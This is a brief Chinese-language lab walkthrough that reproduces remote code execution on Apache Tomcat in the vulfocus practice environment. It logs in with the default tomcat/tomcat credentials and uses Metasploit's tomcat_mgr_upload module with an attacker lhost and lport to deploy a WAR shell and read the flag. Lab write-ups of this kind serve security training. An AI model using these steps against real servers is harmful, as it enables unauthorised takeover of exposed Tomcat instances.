Zab Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell。
漏洞编号:
影响版本:
弱口令
复现步骤:
1,打开漏洞环境vulfocus
2,访问URL点击Manager App
3,验证弱口令,输入默认账号密码tomcat tomcat
4,使用msf进入exploit/multi/http/tomcat_mgr_upload模块
5,依次设置
set rhost vulfocus.fofa.so set rport 60231 set httpusername tomcat set httppassword tomcat set lhost VPS IP set lport 6666
6,run
7,查看flag
